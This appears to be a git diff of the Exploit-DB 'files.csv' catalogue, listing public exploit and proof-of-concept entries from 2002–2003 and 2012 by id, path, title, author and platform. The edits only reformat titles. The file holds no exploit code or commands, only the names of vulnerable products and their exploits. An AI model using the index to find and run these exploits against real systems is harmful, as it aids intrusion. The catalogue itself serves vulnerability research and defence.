21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x,NetBSD 1.4.x/1.5.x/1.6,OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability",2002-07-30,ken@FTU,windows,remote,0 -21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability (1)",2002-07-30,spabam,unix,remote,0 -21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability (2)",2002-07-30,spabam,unix,remote,0 +21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow Vulnerability (1)",2002-07-30,spabam,unix,remote,0 +21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow Vulnerability (2)",2002-07-30,spabam,unix,remote,0 21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x Web Calendaring Incomplete Post Denial Of Service Vulnerability",2002-07-30,Anonymous,windows,dos,0 21674,platforms/linux/local/21674.c,"William Deich Super 3.x SysLog Format String Vulnerability",2002-07-31,gobbles,linux,local,0 21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module Buffer Overflow Vulnerability",2002-07-31,"John C. Hennessy",windows,remote,0 @@ -18968,9 +18968,9 @@ id,file,description,date,author,platform,type,port 21710,platforms/windows/remote/21710.txt,"MyWebServer 1.0.2 Long HTTP Request HTML Injection Vulnerability",2002-08-14,D4rkGr3y,windows,remote,0 21711,platforms/windows/remote/21711.html,"Microsoft Outlook Express 5/6 MHTML URL Handler File Rendering Vulnerability",2002-08-15,http-equiv,windows,remote,0 21712,platforms/windows/dos/21712.txt,"Google Toolbar 1.1.60 Search Function Denial Of Service Vulnerability",2002-08-15,onet,windows,dos,0 -21713,platforms/windows/local/21713.py,"Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP",2012-10-03,b33f,windows,local,0 +21713,platforms/windows/local/21713.py,"Exploit: NCMedia Sound Editor Pro 7.5.1 - SEH & DEP",2012-10-03,b33f,windows,local,0 21715,platforms/php/webapps/21715.txt,"Wordpress Plugin spider calendar Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 -21716,platforms/php/webapps/21716.txt,"Omnistar Mailer v7.2 Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps,0 +21716,platforms/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps,0 21717,platforms/windows/remote/21717.txt,"Microsoft Windows XP HCP URI Handler Abuse Vulnerability",2002-08-15,"Shane Hird",windows,remote,0 21718,platforms/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 Agent Jobs Privilege Elevation Vulnerability",2002-08-15,"David Litchfield",windows,remote,0 21719,platforms/windows/remote/21719.txt,"Apache 2.0 Path Disclosure Vulnerability",2002-08-16,"Auriemma Luigi",windows,remote,0 @@ -18993,11 +18993,11 @@ id,file,description,date,author,platform,type,port 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service Vulnerability",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability",2012-10-04,"Francis Provencher",windows,dos,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop <= 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 -21740,platforms/php/webapps/21740.txt,"phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 +21740,platforms/php/webapps/21740.txt,"phpMyChat Plus 1.94 RC1 - Multiple Remote Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 JLS File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 21742,platforms/php/webapps/21742.txt,"Template CMS 2.1.1 Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 21743,platforms/php/webapps/21743.txt,"phpMyBitTorrent 2.04 Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 -21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager <=1.2.0.2 Retention Policy Vulnerability",2012-10-04,"Piotr Chmylkowski",windows,webapps,0 +21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager <= 1.2.0.2 - Retention Policy Vulnerability",2012-10-04,"Piotr Chmylkowski",windows,webapps,0 21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 Remote File Include Command Execution Vulnerability",2002-08-22,"Jeroen Latour",php,webapps,0 21746,platforms/windows/dos/21746.c,"MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 21747,platforms/windows/dos/21747.txt,"MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 @@ -19041,7 +19041,7 @@ id,file,description,date,author,platform,type,port 21785,platforms/windows/dos/21785.pl,"HCView WriteAV Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21786,platforms/php/webapps/21786.php,"Blog Mod <= 0.1.9 (index.php, month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 -21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 <= ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 +21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link Denial of Service Vulnerability",2002-09-09,"Stefano Zanero",windows,dos,0 21790,platforms/unix/local/21790.sh,"Cobalt RaQ authenticate Local Privilege Escalation Vulnerability",2002-06-28,"Charles Stevenson",unix,local,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch Port Scan Denial Of Service Vulnerability",2002-09-13,"Mella Marco",hardware,dos,0 @@ -19074,7 +19074,7 @@ id,file,description,date,author,platform,type,port 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 Remote Heap Overflow Vulnerability",2002-09-23,eSDee,linux,remote,0 21819,platforms/windows/dos/21819.c,"Trillian 0.74 IRC Raw Messages Denial Of Service Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21821,platforms/windows/dos/21821.c,"Trillian 0.74 IRC PART Message Denial Of Service Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 -21822,platforms/multiple/webapps/21822.txt,"Endpoint Protector v4.0.4.0 Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps,0 +21822,platforms/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps,0 21823,platforms/windows/dos/21823.c,"Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 Memory Corruption (DoS)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 21825,platforms/php/webapps/21825.txt,"phpWebsite 0.8.2 PHP File Include Vulnerability",2002-09-23,"Tim Vandermeersch",php,webapps,0 @@ -19086,7 +19086,7 @@ id,file,description,date,author,platform,type,port 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21833,platforms/php/webapps/21833.rb,"PhpTax pfilez Parameter Exec Remote Code Injection",2012-10-10,metasploit,php,webapps,0 21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 server_sync.php Backdoor",2012-10-10,metasploit,php,webapps,0 -21835,platforms/php/webapps/21835.rb,"qdPM v7 Arbitrary PHP File Upload Vulnerability",2012-10-10,metasploit,php,webapps,0 +21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload Vulnerability",2012-10-10,metasploit,php,webapps,0 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload Vulnerability",2012-10-10,metasploit,linux,webapps,0 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,metasploit,windows,remote,4322 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,metasploit,windows,remote,3217 @@ -19117,7 +19117,7 @@ id,file,description,date,author,platform,type,port 21863,platforms/php/webapps/21863.txt,"Drupal 4.0 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing Vulnerability",2002-09-25,grazer,linux,local,0 -21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software v9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0 +21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0 21868,platforms/hardware/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,metasploit,hardware,remote,0 21869,platforms/hardware/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,metasploit,hardware,remote,0 21870,platforms/linux/remote/21870.txt,"Zope 2.x Incorrect XML-RPC Request Information Disclosure Vulnerability",2002-09-26,"Rossen Raykov",linux,remote,0 @@ -19140,8 +19140,8 @@ id,file,description,date,author,platform,type,port 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module Com_sink Exploit",2012-10-11,FB1H2S,windows,local,0 21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",2012-10-11,metasploit,windows,remote,0 21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 -21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager v8.0 Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 -21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework v4.0 Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 +21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 +21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 Privilege Escalation Vulnerability",2012-10-11,"Nathaniel Carew",windows,local,0 21893,platforms/php/webapps/21893.php,"TightAuction 3.0 Config.INC Information Disclosure Vulnerability",2002-10-02,frog,php,webapps,0 21894,platforms/php/webapps/21894.txt,"Midicart PHP Information Disclosure Vulnerability",2002-10-02,frog,php,webapps,0 @@ -19177,7 +19177,7 @@ id,file,description,date,author,platform,type,port 21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 MsgError.ASP Cross-Site Scripting Vulnerability",2002-10-08,ken@FTU,asp,webapps,0 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 User Credential Disclosure Vulnerability",2002-10-08,ken@FTU,asp,webapps,0 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting Vulnerability",2002-10-09,Max,cgi,webapps,0 -21927,platforms/multiple/remote/21927.rb,"Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 +21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload Vulnerability",2012-10-16,metasploit,php,webapps,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.PHP Cross-Site Scripting Vulnerability",2002-10-10,"Arab VieruZ",php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 PHPInfo Information Disclosure Vulnerability",2002-10-10,"Roland Verlander",php,webapps,0 @@ -19287,7 +19287,7 @@ id,file,description,date,author,platform,type,port 22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 BETA 1 Multiple Cross Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 Arbitrary File Upload",2012-10-17,cr4wl3r,php,webapps,0 22039,platforms/php/webapps/22039.txt,"Symphony CMS 2.3 Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 -22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <=7908 Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 +22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x members2.php Cross Site Scripting Vulnerability",2002-11-25,Sp.IC,php,webapps,0 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 Script Injection Vulnerability",2002-11-25,"Pete Foster",php,webapps,0 @@ -19344,7 +19344,7 @@ id,file,description,date,author,platform,type,port 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)",2012-10-19,xistence,windows,remote,0 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22098,platforms/php/webapps/22098.txt,"Joomla Tags (index.php, tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 -22099,platforms/php/webapps/22099.txt,"CMSQLITE v1.3.2 Multiple Vulnerabiltiies",2012-10-19,Vulnerability-Lab,php,webapps,0 +22099,platforms/php/webapps/22099.txt,"CMSQLITE 1.3.2 - Multiple Vulnerabiltiies",2012-10-19,Vulnerability-Lab,php,webapps,0 22100,platforms/windows/dos/22100.txt,"Internet Explorer 9 XSS Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 say() Format String Vulnerability",2002-12-16,"Marceta Milos",linux,remote,0 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 Multiple Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 @@ -19381,7 +19381,7 @@ id,file,description,date,author,platform,type,port 22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 Default_Theme Cross Site Scripting Vulnerability",2003-01-06,Mindwarper,php,webapps,0 22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 Remote Command Execution Vulnerability",2003-01-06,nmsh_sa,php,webapps,0 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 Session Manager SysLog Format String Vulnerability",2003-01-07,"dong-h0un yoU",linux,remote,0 -22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal Vulnerability",2003-01-07,"Dennis Rand",windows,remote,0 +22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal Vulnerability",2003-01-07,"Dennis Rand",windows,remote,0 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone Cross-Site Scripting Vulnerability",2003-01-09,"Rynho Zeros Web",cgi,webapps,0 22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plug-in CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 @@ -19612,7 +19612,7 @@ id,file,description,date,author,platform,type,port 22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0 22372,platforms/php/webapps/22372.txt,"VaM Shop 1.69 Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 -22373,platforms/php/webapps/22373.txt,"PG Dating Pro v1.0 CMS Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 +22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 22374,platforms/php/webapps/22374.txt,"Wordpress FoxyPress Plugin 0.4.2.5 Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",2012-11-01,metasploit,windows,remote,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 Format String Vulnerability",2003-03-28,"Core Security",linux,local,0 @@ -19638,7 +19638,7 @@ id,file,description,date,author,platform,type,port 22396,platforms/php/webapps/22396.txt,"Wordpress bbpress Plugin Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 22398,platforms/php/webapps/22398.php,"Invision Power Board <= 3.3.4 ""unserialize()"" PHP Code Execution",2012-11-01,EgiX,php,webapps,0 -22399,platforms/php/webapps/22399.txt,"Endpoint Protector v4.0.4.2 Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 +22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Internet Explorer 9 Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0 22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog (index.php, product_id parameter) SQL Injection Vulnerability",2012-11-01,D4NB4R,php,webapps,0 @@ -19652,7 +19652,7 @@ id,file,description,date,author,platform,type,port 22412,platforms/php/webapps/22412.txt,"Advanced Poll 2.0 Remote Information Disclosure Vulnerability",2003-03-22,subj,php,webapps,0 22413,platforms/php/webapps/22413.txt,"PHPNuke 5.6/6.x News Module Article.PHP SQL Injection Vulnerability",2003-03-22,frog,php,webapps,0 22414,platforms/php/webapps/22414.php,"PHPNuke 5.6/6.x News Module Index.PHP SQL Injection Vulnerability",2003-03-23,frog,php,webapps,0 -22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 Malicious IP Header Denial of Service Vulnerability",2003-03-24,"Piotr Chytla",hardware,dos,0 +22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service Vulnerability",2003-03-24,"Piotr Chytla",hardware,dos,0 22416,platforms/hardware/remote/22416.txt,"3Com SuperStack II RAS 1500 Unauthorized Access Vulnerability",2003-03-24,"Piotr Chytla",hardware,remote,0 22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (1)",2003-04-28,"Core Security",windows,dos,0 22418,platforms/windows/remote/22418.c,"Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (2)",2003-04-30,ThreaT,windows,remote,0 @@ -19703,7 +19703,7 @@ id,file,description,date,author,platform,type,port 22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0 22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 -22467,platforms/windows/dos/22467.txt,"KMPlayer v3.3.0.33 Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0 +22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0 22468,platforms/unix/remote/22468.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0 22469,platforms/unix/remote/22469.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0 22470,platforms/unix/remote/22470.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (3)",2003-05-12,eDSee,unix,remote,0 @@ -19885,11 +19885,11 @@ id,file,description,date,author,platform,type,port 22649,platforms/multiple/remote/22649.txt,"P-News 1.16 Administrative Account Creation Vulnerability",2003-05-24,"Peter Winter-Smith",multiple,remote,0 22650,platforms/multiple/dos/22650.py,"BRS WebWeaver 1.0 4 POST and HEAD Denial Of Service Vulnerability",2003-05-26,euronymous,multiple,dos,0 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module SQL Injection Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 -22652,platforms/windows/local/22652.py,"Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0 +22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 (Zps.exe) - Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0 22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 Crash PoC",2012-11-12,"Mada R Perdhana",windows,dos,0 22654,platforms/php/webapps/22654.txt,"BananaDance Wiki b2.2 Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 Crash PoC",2012-11-12,coolkaveh,windows,dos,0 -22656,platforms/php/webapps/22656.py,"vBulletin vBay <=1.1.9 Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 +22656,platforms/php/webapps/22656.py,"vBulletin vBay <= 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,metasploit,multiple,remote,0 22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (1)",2003-05-26,wsxz,linux,remote,0 22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 Remote Buffer Overflow Vulnerability (2)",2003-05-26,jsk,linux,remote,0 @@ -19911,13 +19911,13 @@ id,file,description,date,author,platform,type,port 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x Authentication SQL Injection Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 -22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 <= CSRF/RCE Exploit",2012-11-13,"Ben Sheppard",windows,remote,0 +22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit",2012-11-13,"Ben Sheppard",windows,remote,0 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 Crash PoC",2012-11-13,coolkaveh,windows,dos,0 22680,platforms/windows/dos/22680.txt,"IrfanView RLE Image Decompression Buffer Overflow Vulnerability",2012-11-13,"Francis Provencher",windows,dos,0 22681,platforms/windows/dos/22681.txt,"IrfanView TIF Image Decompression Buffer Overflow Vulnerability",2012-11-13,"Francis Provencher",windows,dos,0 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 -22684,platforms/php/webapps/22684.txt,"Eventy CMS v1.8 Plus Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 -22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio v15 b3 Buffer Overflow Vulnerabilities",2012-11-13,Vulnerability-Lab,windows,dos,0 +22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 +22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow Vulnerabilities",2012-11-13,Vulnerability-Lab,windows,dos,0 22686,platforms/php/remote/22686.rb,"Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",2012-11-13,metasploit,php,remote,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 Remote Command Execution Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 @@ -19967,8 +19967,8 @@ id,file,description,date,author,platform,type,port 22732,platforms/multiple/local/22732.java,"Sun JRE/SDK 1.x Untrusted Applet Java Security Model Violation Vulnerability",2003-06-05,"Marc Schoenefeld",multiple,local,0 22733,platforms/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214 .4 REST Command Memory Disclosure Vulnerability",2003-06-05,di0aD,hp-ux,remote,0 22734,platforms/windows/remote/22734.html,"Microsoft Internet Explorer 6 %USERPROFILE% File Execution Weakness",2003-06-05,"Eiji James Yoshida",windows,remote,0 -22735,platforms/php/webapps/22735.txt,"iDev Rentals v1.0 Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0 -22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break v1.3 SQL Injection (authbypass) Vulnerability",2012-11-15,d3b4g,php,webapps,0 +22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0 +22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (authbypass) Vulnerability",2012-11-15,d3b4g,php,webapps,0 22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 auth.dll pa_modify_accounts() RCE",2012-11-15,rgod,windows,remote,0 22738,platforms/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() Perl Code Evaluation RCE",2012-11-15,rgod,windows,remote,0 22739,platforms/hardware/dos/22739.py,"Broadcom DoS on BCM4325 and BCM4329 Devices",2012-11-15,CoreLabs,hardware,dos,0 @@ -19990,7 +19990,7 @@ id,file,description,date,author,platform,type,port 22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 LSMCODE Environment Variable Local Buffer Overflow Vulnerability",2003-06-01,watercloud,aix,local,0 22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3 .5 Multiple GET Requests Denial Of Service Vulnerability",2003-06-11,posidron,windows,dos,0 22758,platforms/windows/remote/22758.txt,"silentThought Simple Web Server 1.0 Directory Traversal Vulnerability",2003-06-12,"Ziv Kamir",windows,remote,0 -22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 Malicious GET Request Denial Of Service Vulnerability",2003-06-12,"Ziv Kamir",windows,dos,0 +22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Request Denial Of Service Vulnerability",2003-06-12,"Ziv Kamir",windows,dos,0 22760,platforms/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Account Configuration Modification Vulnerability",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -20056,7 +20056,7 @@ id,file,description,date,author,platform,type,port 22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 Remote GET Request Denial Of Service Vulnerability",2003-06-23,posidron,windows,dos,0 